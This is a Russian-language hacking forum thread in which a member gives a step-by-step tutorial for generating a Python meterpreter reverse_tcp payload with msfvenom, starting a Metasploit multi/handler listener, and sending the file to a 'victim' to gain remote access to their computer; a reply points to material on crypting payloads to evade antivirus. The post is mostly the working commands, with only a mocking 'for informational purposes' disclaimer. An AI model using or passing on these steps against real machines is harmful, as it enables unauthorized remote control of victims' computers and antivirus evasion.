Интересно Metasploit и Python

Eteriass

Pro Member
Сообщения
107
Оценка реакций
196
1605624573403.png
Привет друзья. Более чем уверен, что большинство из вас знакомы с таким зАмаечательным фреймворком для пентеста как Metasploit Framework, а тем кто им пользуется изевстны такие понятия как meterpreter, payload, handler и тд. Про них собственно мы сегодня и поговорим. Про удаленный доступ через метасплоит и пайтон. Причем же тут пайтон? А при том что изпользовать мы будем полезную нагрузку на нем, для разннобразия так сказать.

Для сего кулинарно-компьютерного пиздеца нам понадобиться:
1. Собственно сам метасплоит
2. Установленный пайтон
3.И какая нибудь дырка для выхода за пределы локалхоста, будь то VPN, статический ip, туннель , или выделенный сервер. Тут уж как нибудь сами выберите, из того что есть под рукой. Лично я буду использовать туннель
И так, начнем
:

Как и любой немножечко умный повар мы начнем с подготовки главного ингредиента, проще говоря генерируем полезную нагрузку с помощью msfvenom. Так как использовать я буду payload на python, моя команда выглядит так:
msfvenom -p python/meterpreter/reverse_tcp lhost= ваш ip lport=порт > /home/eteriass/Desktop/payload_python.py



VirtualBox_ParrotHome_13_10_2020_22_15_36.png
Полезная нагрузка готова. Теперь нужно как то прослушивать порт , чтобы не проебать удаелнку. Запускаем метасплоит
  • msfconsole - тут без коментариев, все знают шо это
  • use exploit/multi/handler - это тот самый слушатель
  • set lhost XXXXXXXX - Это наш ip
  • set lport XXXXX - Это порт который нужно прослушивать
  • exploit - запуск прослушивания
Теперь отправляем файл жертве и ждем пока его запустят , после чего мы получим удаленный доступ к скомпрометированному компьютеру. VirtualBox_ParrotHome_13_10_2020_22_18_25.png
В моем случае ждать не пришлось, потому что жертвой был я сам, и как видите доступ получен.
Такие дела друзья. Метасплоит сам по себе очень мошный и интересный инструмент, владеть которым следует всем, начиная от пентестеров и до мамкиных черношляпников.
На этом пожалуй все и не забывайте, что статья написана только для ознокомления, и вообще все это фотошоп, монтаж, бред, бдсм и другие умные слова. А автор писал под диктовку высших сил, и в душе не ебет че только что произошло, вот. А с вами был чумной доктор, чей ник в 2020-ом году звучит уже не так весело. Увидимся, ну, когда нибудь...


P.s. Чисто спонтанно решил добавить водяные знаки, некоторые жители Казахстана тут совсем непричем
 
Последнее редактирование:

Anorali

Pro Member
Сообщения
96
Оценка реакций
150
Эх, не успел за 20 минут, друг мой, не успел)

P.S. Риас топ!
 
  • Like
Реакции: ananda и Eteriass

StanislavP

Member
Сообщения
20
Оценка реакций
15
Ещё есть похожая

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, но с анализом работы Meterpreter, reverse_tcp и прочих функций, которые работают на Python3. Это многим поможет найти ответ на вопрос по типу "Как закриптовать payload" или "почему антивирус ругается на файл".